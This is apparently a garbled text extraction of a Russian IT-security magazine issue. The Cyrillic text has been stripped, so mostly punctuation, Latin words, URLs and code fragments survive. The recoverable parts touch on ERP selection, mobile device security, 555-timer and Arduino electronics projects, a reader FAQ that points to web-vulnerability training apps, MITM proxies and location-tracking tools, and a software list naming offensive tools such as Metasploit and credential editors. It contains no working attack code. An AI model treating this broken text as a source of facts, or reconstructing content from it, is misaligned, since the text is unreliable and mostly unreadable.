. Excel ,
-, . ,
ERP .
, ERP:
, ROI Return of Investment.
,
,
(
) ,
Unixoid ,
, -
, , .
, , ?
.
? :) ,
,
: lozovsky@glc.ru. , -
(http://group.xakep.ru) .
, .
, ,
.
,
, ,
.
CBA Cost-Benefits Analysis. .
, .
. .
1. , .
.
. .
2. , CBA
,
, .
,
, .
.
, ,
. , Microsoft Rapid Economic
(
- CBA-, REJ
,
/ -
, ERP
Justification (REJ).
:
1. -.
2. .
3. .
4. .
5. .
6.
.
Microsoft,
,
.
.
,
, ,
.
- , .
, , ,
. ERP -,
, . ,
.
. ,
. :
( , ),
,
- .
-
.
ERP
.
,
.
,
, ,
ERP.
, -,
,
,
. ,
-, , .
:
( ) N
ERP .
, Order processing.
(, -)
: , ERP-, ,
, ERP-.
, ERP-
. ,
:
-, ,
(, , ).
, :
ERP- ;
ERP- ,
(,
, ,
HTTP://WWW
links
ERP
: onsult.ru.
CBA:
http://goo.gl/7Bhn8.
Build an airtight
business case for new
IT investments:
http://goo.gl/UE08K;
Magic Quadrant
for Midmarket and
Tier 2-Oriented ERP
for Product-Centric
Companies:
gartner.com;
ERP 2009
,
);
ERP-
ERP- EDI (,
e-Cod).
. ,
, -,
,
.
ERP-,
, , :).
.
ERP-.
SAP.
-,
, ,
. SAP CRM.
ERP
long list .
,
ERP-.
:
. , ,
,
.
,
long list
. long list
( ,
). , long
list . ,
,
,
.
:
, ,
.
ERP-
2009 :
http://goo.gl/J57UC.
ERP .
long list,
.
ERP-.
excel-,
:
, , -
.
2-4 .
RFP Request for
Proposal ( ), . , , .
, , -
. short list.
short list
.
- ( Ca-Plus
Business solution)
.
, . ,
: ,
, ,
. -
( ,
), - (, , ).
ERP-.
long list,
.
.
, ,
ERP , /
.
:
1. ,
,
.
2.
,
. ,
,
, ,
.
3. ,
. -,
. ,
.
4. ,
, . .
long list short list
,
-
.
,
, ,
.
. , - , - .
, ,
, . , short list SaaS, ,
( , ),
, 5-7 .
,
.
. , .
,
.
. .
(,
, )
.
, ,
-
ERP-. :
;
;
;
ERP,
;
long list;
, short list;
;
;
.
,
. ,
. z
SYN/ACK
, , Group-IB
. ,
.
, .
, VPN, flash
java-script, , , .
,
.
BlackBerry,
, ,
.
, . Windows Mobile, Android, iOS, Symbian,
. ,
, .
, .
,
.
,
. ,
, .
1. .
,
,
, , .
2. -.
Skype, Icq, Jabber
,
, - .
3. , .
DropBox
- ,
.
, usb-,
.
,
, -. ,
.
4. .
.
5. .
VNC, TeamViewer
.
VPN.
, .
6. .
,
, sms-
. ,
.
.
-
,
.
, ,
. ,
.
, .
WindowsMobile
. 5.0 6. , -
. 6.0
. ,
.
. (Kaspersky
Endpoint Security for Smartphone, Dr.Web Enterprise Security Suite,
McAfee Mobile Security for Enterprise, Symantec Mobile Security
Suite for Windows Mobile, ESET NOD32 Mobile Security, GuardianEdge
Smartphone Protection).
,
, ,
2010 .
.
GuardianEdge DLP-.
ActiveSync Exchange Server
. Exchange Server
,
, - .
, ,
,
. .
Windows Phone 7 (WP7) , .
SymbianOS
Nokia WP7, Symbian
. Nokia
sis- . ,
. ,
. Java-
sis- ( , ), ,
,
, .
,
, Exchange ActiveSync (EAS) policies,
.
,
(Symantec Mobile Security for Symbian, Kaspersky Endpoint Security for
Smartphone, ESET NOD32 Mobile Security),
Windows Mobile .
,
installserver, .
,
, , , .
. Nokia ,
. 2-2,5 ,
.
iOS
Apple. (3gs
) . EAS,
Apple Push Notification
Service, .
Apple
Store .
(GuardianEdge Smartphone Protection, Panda Antivirus for Mac, Sophos
Mobile Control). Panda , iOS-, Mac.
Sophos , ( , 2011 . .). , Symbian,
- Jailbreaka.
iOS
.
Apple
.
AndroidOS
, Google,
. 1.6 Exchange Activesync,
. EAS (, ) . .
(McAfee WaveSecure,
Trend Micro Mobile Security for Android, Dr.Web Android, Kaspersky).
Android Market,
. Android , ,
,
(,
Nielsen, ,
2011 . .
,
. .).
, , Symbian iOS, ,
root. root
. ,
.
, ,
, .
, , . -
, . ,
.
1. .
, . ,
.
( ),
.
2. .
,
, .
3. .
, .
, .
4.
.
,
. -. ,
.
5. , .
,
Windows Mobile ,
. , .
6. Exchange ActiveSync
, ,
( ),
.
7. .
,
( VPN, ),
( IPSEC,
).
/
, .
8. , .
.
, ,
, .
,
( ) ,
.
,
, Exchange-
EAS.
BlackBerry OS ( ), ,
. z
PHREAKING
(po@kumekay.com)
555
5 555
555
. -
, , 555
.
(555contest.com), .
: , , .
$1500.
,
555; ; ; , ; ,
.
, 555 ,
. ?
, ,
,
, . .
1. . ,
.
2. , .
(Vcc) , ,
, .
3. .
( ). 2
, , (
0,5 ), . ,
200 .
, .
4. . ( 0,7 ),
, .
, ,
(, ).
5. . , ,
. , ,
10 .
6. , . 2/3 Vcc,
.
, .
7. . ,
, ,
. 200
.
8. . . 4,5 16 .
9-, USB
1. .
,
,
. ,
, .
t=1,1*R1*C4.
,
, .
, C4=100 R1=2,2
4 .
:
0,000001 15 .
, .
2. .
3. .
- ,
, t1, ,
t2, . ,
ASCII-
: ____. ,
, RC- (
R2, R3 1) f = 1,44/((R3 + 2R2 )C1).
t1 = 0,693 (R3 + R2)C1
,
t2=0,693(R2)C1 .
.
,
.
, .
, ,
,
. ,
,
sureelectronics.net,
: .
, !
1: . ,
,
.
? -, 555 (
IC1). ,
DIP
. ,
. , ,
,
NE555N.
, 556 558,
2 4 .
,
. -, : C1 5
10 C3 10 .
: (LED1)
(R5) 300-600 ( 470 ),
, R1 1
Schematic components: C1 10; C2 100; C3 10; IC1 NE555; LED1; R1; R2 10; R5 470; S1
R2 10 .
( ,
). C2 100 ,
.
(,
), ,
.
,
.
, .
C3,
, .
, ,
, , .
.
. ,
.
555
: ,
,
1
4, 5 8.
,
. ,
, , .
,
, .
,
,
, . , ,
.
.
.
, , .
,
,
USB-
, , .
,
.
,
( ), ,
:
USB,
, .
,
,
.
(, )
. ,
.
,
,
.
, ,
,
.
.
,
C4 ,
.
, 10 , ,
,
100 , .
.
( ) ,
4.
, ,
RC- . C1 100 , R2
1
R3 10 .
3 ,
,
.
R3.
, ,
.
.
.
555
. , ,
. ( )
//,
,
.
.
DealExtreme (s.dealextreme.com/search/servo),
. ,
.
- :
, SERVO-3
, SERVO-1,
SERVO-2.
,
50
0,9 2,1 , ,
. RC-
,
.
,
,
D1. 1n4148,
,
.
.
555 , 15
, .
4,8 6 .
9 ,
. 7805,
5 . ,
. , ,
,
, . :
,
, ,
+5 .
,
,
.
Schematic components: C1 22; C2 100; C3 10; D1 1n4148; IC1 NE555; IC2 7805; R1; R2 56; R3 100; SERVO
Schematic components: C1 10; C2 100; C3 10; IC1 NE555; LED1
,
, : ,
, .
555.
,
.
,
Schematic components (continued): R1 10; R2 10; R3 100; R4; R5 470; S1; T1 2N3904
, R4 T1. ,
, , 200 ,
555, .
NPN- 2N3904, -
200 ,
, ,
- , IRF630,
9. ,
12 , .
,
3-6 ,
.
linux, ,
. ,
,
, . , ,
. :
,
!
555. (,
) 4
,
, .
IC2 . .
.
3 ,
LED2 (
, ,
).
S1, , 3 , LED1, ,
LED2 -, - ,
. ,
C4 R1.
6 2/3
Vcc, .
, R1
500 ,
.
, . instructables.com.
555
Timer Pro schematica.com/555_Timer_design/555_Timer_PRO_EX.htm,
(,
$29, ,
). z
Schematic components: C1 10; C2 100; C3 10; C4 100; C5 10; IC1 NE555; IC2 NE555; LED1; LED2; R1 2.2; R2 10; R3 10; R4 470; R5 470; R6 10; S1; SP1
PHREAKING
(po@kumekay.com)
Arduino
,
, . , .
. , .
, . , ,
, , ,
, .
,
(, )
, ,
, .
. ,
,
, .
, .
:
1. ,
;
2. , ;
3. (
- , );
4. , , ,
;
5. , , .
.
: ,
- .
, ,
, 12
.
20 ,
. .
, .
,
. ,
: , , .
8-10 60 ,
.
0,03 2 ( 0,2 ),
, ,
.
.
. -
, , 500 ,
. -
, , ,
. ( )
,
- , ! , ,
. , , (
) , 20-30
. ,
.
12 : , .
ATX . , ,
,
- (
), . ATX ,
20- ,
,
+12 , . ,
-
Schematic components: D1 1N4007; D2 1N4007; IC1 SS59E; IC2 SS59E; L1; Q1 IRL530N; R1 10; R2 100; R3 10; T1 2N3904; U1 ARDUINO
, .
12- . , .
, , ,
, 1 . ,
.
npn-,
- . ( MOSFET) N-,
, . -
,
(
100 ). -
5 , ,
, . IRL530N
, 17 100 . , (, IR F630M),
12 .
, . 2N3904,
npn-.
: ,
, , - ,
.
,
( 1n4007) ,
, ,
,
. , , , , .
, .
( ) , - ,
, ,
. ,
,
,
. , ,
. , .
( ) (
) . , . , , ,
( )
.
. -
!
: ,
,
, ,
.
.
.
,
.
!
, ,
.
,
, 400-1000 .
-
,
.
SS59E,
SOT223 ( ), , . to92 ( SS19,
SS49 SS495A). ,
. CD/DVD,
Bornimago http://s.dealextreme.com/search/magnets,
.
. . :
, , , ,
. .
.
, , . ,
,
,
.
,
.
. , ,
,
, , ,
.
Arduino, . Arduino Diecimila,
Duemilanove, Uno .
,
, ,
. ,
,
.
,
. D1
L1, D2
MO- Q1.
( ),
. IRL, Q1
R3 R2 D10 Arduino (
-). TO220 (
) : 1 (), ; 2 () , 3 ()
.
+12 .
Arduino - , 12- , ,
c
2,1 , 5,5 .
USB , .
. IC1 IC2 A0 1, VCC +5 , GND
. IC1 , IC2
( ,
-). .
10 ( ).
3 : +5 ,
A2.
- .
.
, , , , , . ,
, .
Arduino.
, , .
,
,
. , .
1
const int in1 = A0;   // sensor 1 input
const int in2 = A1;   // sensor 2 input
const int out1 = 10;  // PWM output that drives the electromagnet
int s1 = 0;           // reading from sensor 1
int s2 = 0;           // reading from sensor 2
int o1;               // difference between the two readings

void setup() {
  // the readings are printed over the serial port, so it must be opened
  Serial.begin(9600);
}

void loop() {
  analogWrite(out1, 255);  // electromagnet at full power
  delay(15);               // wait for the field to settle
  s1 = analogRead(in1);
  s2 = analogRead(in2);
  o1 = s2 - s1;
  Serial.print("magnet on: s1 = ");
  Serial.print( s1 );
  Serial.print(" s2 = ");
  Serial.print( s2 );
  Serial.print(" delta = ");
  Serial.print( o1 );
  analogWrite(out1, 25);   // electromagnet at about 10% power
  delay(15);               // wait for the field to settle
  s1 = analogRead(in1);
  s2 = analogRead(in2);
  o1 = s2 - s1;
  Serial.print("magnet off: s1 = ");
  Serial.print( s1 );
  Serial.print(" s2 = ");
  Serial.print( s2 );
  Serial.print(" delta = ");
  Serial.println( o1 );    // end of the output line
  delay(1000);             // pause before the next measurement
}
,
( ).
,
- , . Arduino -.
(PWM, - )
, .
, , -
, ,
.
10% 100% .
, .
: , ,
( , ) . ,
,
,
, , . ,
, !
2
const int in1 = A0;   // sensor 1 input
const int in2 = A1;   // sensor 2 input
const int in3 = A2;   // third analog input
const int d10 = < >;  // 10% power: substitute your own value
const int d100 = < >; // 100% power: substitute your own value
const int out1 = 10;  // PWM output that drives the electromagnet
int s1 = 0;           // reading from sensor 1
int s2 = 0;           // reading from sensor 2
int s3 = 0;           // reading from the third input
int o1 = 255;         // PWM value written to the output
int d = 0;
int v;

void setup() {}

void loop()
{
  s1 = analogRead(in1);
  s2 = analogRead(in2);
  d = map(o1, 25, 255, d10, d100);
  v = abs(s1 - s2) + d;
  o1 = map(v, 0, 1024, 25, 255);
  analogWrite(out1, o1);
  delayMicroseconds(100);
}
, , ,
.
, -
, , !
,
, .
! , zeltom.com/emls.aspx
. ! z
UNITS
Step (twitter.com/stepah)
faq
united?
faq@real.xakep.ru
Q:
. .
, ,
, : SQL
Injection, XSS . ,
?
A: ,
,
, OWASP Top
10 (owasp.org/index.php/OWASP_Top_Ten_Project).
-.
:
A1: Injection;
A2: Cross-Site Scripting (XSS);
A3: Broken Authentication and Session
Management;
.
( )
.
,
, ,
: (bit.ly/xakep_trainings). Mutillidae (bit.ly/Mutillidae).
OWASP Top 10.
,
. ,
.
XAMPP-. ,
.
Passive DNS query tool
(code.google.com/p/passive-dns-query-tool).
RubyGems:
gem install passive-dns
. ,
ISC
API-,
(
dnsdb@isc.org). DNSParse,
.
:
./pdnstool.rb <ip|domain|cidr>
Q: - , DNS
?
zdes_byla_malware.cc
DNS
?
A: ,
DNS:
DNSParse, ISC, BFK.de CERTEE.
Q: ,
.
?
A: LoadOrder (technet.microsoft.com/ru-ru/sysinternals/bb897416). 2006 ,
.
LESS ,
Hatkit Proxy
DEP/ASLR
,
.
Q: -
, ,
,
?
A: .
, ,
,
. Java- (bit.ly/reveal_pass),
.
.
.
Q: , .
,
,
. !
,
100%
. .
?
A: ,
: .htaccess (
)
cgi-bin.
cgi-bin htdocs .
. ,
php.ini, :
auto_append_file = "/home/user/USER/cgi-bin/security.cgi"
PHP-
security.cgi, .
,
, .
Q: , DEP ASLR?
, , -,
,
,
- ?
A: Microsoft
EMET
Enhanced Mitigation Experience Toolkit (bit.ly/EMETpage).
GUI-,
, DEP/ASLR, .
DEP, SEHOP,
ASLR, HeapSpray EAF. ,
( ) .
Q:
-
Python.
A: ,
web.py (webpy.org), cherry.py (cherrypy.org), Django (djangoproject.com), Tipfy (tipfy.org)
Flask (flask.pocoo.org). ?
Flask,
-
:
from flask import Flask
app = Flask(__name__)

@app.route("/")
def hello():
    return "Hello World!"

if __name__ == "__main__":
    app.run()
:
$ easy_install Flask
$ python hello.py
* Running on http://localhost:5000/
, -
5000 .
web2py (web2py.com).
,
Python ( ), - SSL, SQLite,
, - (
web2py.com/demo_admin/default/site).
,
,
. -
:
def index():
    return "Hello World!"
Q: ,
?
A: tcpdump
Maemo,
Nokia N900. . ,
tcpdump Android. ,
Packet Sniffer (sites.google.com/site/androidarts/packet-sniffer). ,
jailbreak, . ,
,
( Wi-Fi Bluetooth)
. iPhone , pirni (, ,
Cydia). ,
. ,
, ,
Wireshark (wireshark.org) .
Q: ,
.
?
A:
, , screenr.com. ,
. .
Windows,
Mac. , ,
API,
.
Q:
.
, .
?
A:
, , ,
. ,
,
.
.
Yahoo! YSlow (developer.yahoo.com/yslow).
Yahoo
Firefox,
Firebug. Yslow : ,
, -
Document
Object Model (DOM),
.
,
JavaScript-
Smush.It.
Web Page Test (webpagetest.org).
AOL ,
. Web Page Test
.
PageSpeed (code.google.com/speed/pagespeed).
, YSlow, -
Firefox/Firebug.
- Page
Speed
-
.
.
. <script>,
. ,
(,
),
,
. ,
,
, ,
.
2-3 .
, .
yepnope (yepnopejs.com).
Q: - CSS ? ,
, , ?
A:
, Sass (sass-lang.com)
LESS (lesscss.org). CSS , . ?
: , , ,
LESS, CSS,
.
LESS,
( @):
@the-border: 1px;
@base-color: #111;
#header {
color: @base-color * 3;
border-left: @the-border;
border-right: @the-border * 2;
}
#footer {
color: @base-color + #003300;
}
:
#header {
color: #333;
border-left: 1px;
border-right: 2px;
}
#footer {
color: #114411;
}
CSS .
Q:
Windows x64!
A: Windows 7 x64,
.
,
, virtdbg (code.google.com/p/virtdbg).
,
Intel (VT-x), .
,
.
,
BSOD.
Q: ,
. ,
(
Foursquare),
. :).
A: , , .
.
, creepy (github.com/ilektrojohn/creepy). ,
:
;
,
API;
EXIF- .
.
- .
Q:
,
MITM?
,
.
A: Hatkit Proxy
Project (bit.ly/hatkit). :
GUI-, TCP/
HTTP-;
MongoDB
;
HTTP- . z
>Security
Blazentoo 0.1b
BugChecker
Creepy 0.1.9
metasm
narly
Pyloris 3.2
quickrecon 0.2.3
radare2
RainbowCrack 1.5
Scapy 2.2.0
scdbg
>Net
BWMeter 5.4.1
DNSDataView 1.20
FirewallBuilder 4
inSSIDer 2.0.7
Internet Explorer 9
KpyM Telnet-SSH Server 1.19c
LAN Search Pro 9.0.1
NetSetMan 3.2.3
Odysseus 2.0.0.84
OTR localhost AIM proxy 0.3.1
RFIDIOt 1.0a
RogueScanner 2.6.0.0
SIP Inspector 1.31
Swish 0.4.6
TeamSpeak3 3.0.0
ThreatFactor 1.04
TightVNC 2.0.2
Tunngle 4.3.2.0
USB to Ethernet Connector 4.0
VodBurner 1.0.5
>Misc
1Password for Windows 1.0.5
Clavier+ 10.6.1
CodySafe
Launchy 2.6B2
OnTopReplica 3.3
Piles
Preme 0.941
Prey 0.5.3
Prio - Priority Saver 1.99
UltraSearch 1.4
ViGlance OneStep 2
winstack 0.80
>>WINDOWS
>Development
010Editor 3.1.3
CodeBlocks 10.05
Crack.NET v1.2
Diffuse 0.4.4
Enterprise Architect
HttpWatch Basic Edition 7.1.36
jQueryPad
LINQPad
Microsoft Web Platform Installer 2.0
Mockups for Desktop 2.0.19
OllyDbg 2.0.1 alpha 3
SmartAssembly 6.0
Visual Paradigm for UML 8.1 CE
Web Storm 2.0.1
>Devel
Apache Hive 0.7
Django 1.3
>>UNIX
>Desktop
Cardapio 1.0
CuneiForm 12
DjView4 4.7
DjVuLibre 3.5.24
FSV2 1.1.0
Geeqie 1.0
Glippy 0.2.2
Google Picasa 3.0.5744
Guake 0.4.2
LyX 2.0.0
MyTetra 1.28
Parcellite 1.0.1
Qmmp 0.5.0
Shotwell 0.9
Trimage 1.0.5
Webilder 0.6.9
YAGF 0.8.6
Zim 0.50
>Multimedia
AIMP v3.00 Beta 1
Fotobounce 3.2.1
FotoSketcher v2.00
Foxit Reader 4.3
Free Audio Editor 2011
Inkscape 0.48.1
MetatOGGer 4.0
Poladroid 0.9.6r0b
Sculptris Alpha 5
Similarity 1.5.4 beta
Songbird 1.9.3
Tableau Public
VLC 1.1.8
Zoner Photo Studio Free
>System
Auslogics Disk Defrag 3.2
BatteryCare 0.9.8
Beep Codes Viewer 0.4.7.462
DLL Archive 1.0.1
DOSBox 0.74
Double Driver 4.1
FileSeek 2.1.3
HashTab 4.0
LogLady 1.8
Open Hardware Monitor Version 0.2.1
Sikuli-X 1.0rc2
Soluto Beta
Splunk 4.2
SSD Tweak Utility 1.7
UNetbootin 5.49
VirtualBox 4.0.4
Watch 4 Folder 2.0
tinc 1.0.13
VERA 0.3
virtdbg
Visual DuxDebugger 2.0
Windows Credentials Editor v1.1
(WCE)
>Security
Arp scan 1.8
Chaosmap 1.3
Metasploit Framework 3.6.0
mitmproxy 0.4
Monocle Host Discovery Tool 1.0
Multi Threaded TCP Port Scanner 1.3
Packet Fence 2.1.0
QuickRecon 0.2.4
Social-Engineer Toolkit 1.3
sslsnoop 0.4
Subdomain Checker 0.1
t50 2.45
Tor 0.2.1.30
USBsploit 0.6
Wappalyzer 1.13.0
WhatWeb 0.4.7
yInjector
Creepy 0.1.9
Dradis v2.6.1
metasm
Radamsa v0.1.7
radare2
Scapy 2.2.0
sickfuzz 0.3
virtdbg
xsser 1.5.1
>>Net
aMule 2.2.6
EiskaltDC++ 2.2.1
Firefox 4.0
FreetuxTV 0.5.2
Gnash 0.8.9
Google Chrome 10.0.648.204
Hotot 0.9.9
inSSIDer 0.1
KTorrent 4.1
Midori 0.3.3
Minitube 1.4.1
Opera 11.01
Rekonq 0.7.0
Remmina 0.9.2
TrafficPanel 2.5
Transmission 2.22
Twitgin 0.3.0
Vacuum-IM 1.1.0
FriCAS 1.1.2
GCC 4.6.0
HTSQL 2.0.1
JRuby 1.6
Jython 2.5.2
Lazarus 0.9.30
Logisim 2.7.0
Matplotlib 1.0.1
Padre 0.84
PHP 5.3.6
Sqliteman 1.2.2
SWIG 2.0.3
TagLib 1.7
Violet UML Editor 0.21.1
wxPython 2.8.11.0
wxWidgets 2.8.12
>>MAC
Bean 2.4.3
Colloquy 2.3
DropCopy 1.71
Freemind 0.9.0
Juice 2.2
KisMac 0.3.3
MindNote 1.6
NovaBench 1.0
Nvu 1.0
OneButton FTP 1.0
Shiira 2.3
Skim 1.3.13
Sunrise 2.1.5
TextWrangler 3.5.3
Time Out 1.5.7
Tofu 2.0
Tomato Torrent 1.5.1
Xee 2.1.1
xPad 1.2.6
xTorrent 2.0
>X-distr
openSUSE 11.4
>System
AMD Catalyst 11.3
App Runner 0.4.9
Compiz 0.9.4
Fuse-exfat 0.9.4
GlassFish 3.1
GParted 0.8.0
Indicator-Virtualbox 1.1.1
Linux Kernel 2.6.38
Lucene 3.1
MultiSystem
nVidia 260.19.44
VirtualBox 4.0.4
Wine 1.3.17
Xen 4.1
Zfs-fuse 0.7.0
>Server
Apache 2.2.17
BIND 9.7.3
Dnsmasq 2.57
Dovecot 2.0.11
Drizzle 7 GA
HAproxy 1.4.14
LFTP 4.2.1
Monkeyd 0.13.2
MyDNS 1.1.0
nginx 0.9.6
ngIRCd 17.1
Openfire 3.7.0
OpenLDAP 2.4.25
OpenVPN 2.1.4
ProFTPD 1.3.3e
Samba 3.5.8
Squid 3.1.12
XMail 1.27
Games
Red Eclipse 1.0
UNITS
HTTP://WWW2
JavaScript-
CLOUD9
IDE
cloud9ide.com
GLIFFY
gliffy.com
-, JavaScript. :
Eclipse IDE Java C++, ,
- ,
.
,
JavaScript. Cloud9 IDE
,
watch , ,
GitHub.
- , UML-
, Microsoft Visio.
, Gliffy.
,
( ), , , ,
. , .
WUALA
wuala.com
CROCODOC
crocodoc.com
, Dropbox ( ,
), .
, .
? Wuala , Dropbox,
. , , / .
.
, , API- .
crocodoc :
( , PDF) . , ,
, .
. , , Word Acrobat.